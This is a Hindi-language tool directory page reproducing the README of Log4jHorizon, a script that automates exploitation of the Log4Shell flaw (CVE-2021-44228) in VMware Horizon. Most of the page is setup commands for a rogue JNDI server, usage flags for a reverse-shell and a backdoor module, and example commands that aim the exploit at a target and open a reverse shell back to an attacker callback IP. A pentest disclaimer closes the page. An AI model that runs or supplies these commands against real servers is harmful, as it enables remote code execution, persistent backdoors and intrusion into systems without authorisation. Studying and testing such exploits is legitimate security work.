Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
Log4jHorizon — CVE-2021-44228 का VMWare Horizon में दोहन करना, रिमोट कोड निष्पादन और अधिक के लिए। | Kitploit
उपकरण/GitHubGitHub/puzzlepeaches/log4jhorizon
भेद्यता स्कैनरशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगरेड टीमिंगरिमोट एक्सेस टूलपेलोड डेवलपमेंट
GitHubpuzzlepeaches/log4jhorizon

Log4jHorizon

CVE-2021-44228 का VMWare Horizon में दोहन करना, रिमोट कोड निष्पादन और अधिक के लिए।

रिपॉजिटरी देखें
120134 साल पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

Log4jHorizon

VMWare Horizon में CVE-2021-44228 का दोहन करना, रिमोट कोड एक्ज़ीक्यूशन और अधिक के लिए।

  • Crossing the Log4j Horizon - A Vulnerability With No Return

इस बार कोड और README.md थोड़े बिखरे हुए हैं। अपडेट आ रहे हैं!

क्यों?

इस कमज़ोरी के प्रूफ ऑफ कॉन्सेप्ट बिखरे हुए हैं और इन्हें मैन्युअल रूप से करना पड़ता है। यह रिपॉज़िटरी एक्सप्लॉइटेशन प्रक्रिया को स्वचालित करती है। पोस्ट-एक्सप्लॉइटेशन के लिए मार्गदर्शन हेतु ऊपर दिया गया ब्लॉग पोस्ट देखें।

इंस्टॉल

इस रिपॉज़िटरी का उपयोग मैन्युअल रूप से या Docker के साथ किया जा सकता है।

मैन्युअल इंस्टॉल

एक्सप्लॉइट को मैन्युअल रूप से डाउनलोड और चलाने के लिए, निम्नलिखित चरणों को निष्पादित करें। पहले, सुनिश्चित करें कि आपके अटैकर होस्ट पर Java और Maven इंस्टॉल हैं। Debian आधारित ऑपरेटिंग सिस्टम पर apt का उपयोग करके ऐसा करने के लिए, निम्नलिखित कमांड चलाएँ:

root@kitploit:~
apt update && apt install openjdk-11-jre maven

GitHub रिपॉज़िटरी को क्लोन करें और सभी python आवश्यकताएँ इंस्टॉल करें:

root@kitploit:~
git clone --recurse-submodules https://github.com/puzzlepeaches/Log4jHorizon \
    && cd Log4jHorizon && pip3 install -r requirements.txt

Log4jHorizon रिपॉज़िटरी के रूट से, नीचे दिए गए कमांड का उपयोग करके Rogue-Jndi प्रोजेक्ट को संकलित करें:

root@kitploit:~
mvn package -f utils/rogue-jndi/

Docker इंस्टॉल

पहले, सुनिश्चित करें कि आपके अटैकिंग होस्ट पर Docker इंस्टॉल है। (मैं आपको यह करने के बारे में नहीं बताऊँगा)

उसके बाद, रिपॉज़िटरी को क्लोन करने और उस Docker इमेज को बनाने के लिए निम्नलिखित कमांड निष्पादित करें जिसका हम उपयोग करेंगे।

root@kitploit:~
git clone --recurse-submodules https://github.com/puzzlepeaches/Log4jHorizon \
    && cd Log4jHorizon && docker build -t Log4jHorizon .

कंटेनर चलाने के लिए, अपने कमांड लाइन फ़्लैग्स जोड़कर निम्नलिखित जैसा कमांड चलाएँ। ध्यान दें कि कंटेनर रिवर्स शेल को नहीं पकड़ेगा। आपको एक अलग शेल सेशन में ncat लिसनर बनाना होगा:

root@kitploit:~
docker run -it -p 1389:1389 Log4jHorizon \
    -r -t horizon.acme.com -i 192.168.1.1 -p 4444

उपयोग

root@kitploit:~
usage: exploit.py [-h] -t URL -i CALLBACK [-p PORT] [-r] [-b]

optional arguments:
  -h, --help            show this help message and exit
  -t URL, --target URL  VMWare Horizon IP
  -i CALLBACK, --ip CALLBACK
                        Callback IP for payload delivery and reverse shell.
  -p PORT, --port PORT  Callback port for reverse shell.
  -r, --revshell        Module to establish reverse shell using node.exe.
  -b, --backdoor        Module to add backdoor.

उदाहरण

अपने स्थानीय सिस्टम पर इंस्टॉल किए गए टूल का उपयोग करके रिवर्स शेल प्राप्त करें:

root@kitploit:~
python3 exploit.py -r -t horizon.acme.com -p 442 -i 192.168.1.1

अस्वीकरण

यह टूल पेनेट्रेशन टेस्टिंग के दौरान उपयोग के लिए डिज़ाइन किया गया है; पूर्व पारस्परिक सहमति के बिना लक्ष्यों पर हमला करने के लिए इस टूल का उपयोग अवैध है। सभी लागू स्थानीय, राज्य और संघीय कानूनों का पालन करना अंतिम उपयोगकर्ता की ज़िम्मेदारी है। डेवलपर्स कोई दायित्व नहीं मानते हैं और इस प्रोग्राम के किसी भी दुरुपयोग के लिए ज़िम्मेदार नहीं हैं।

टूल डाउनलोड करें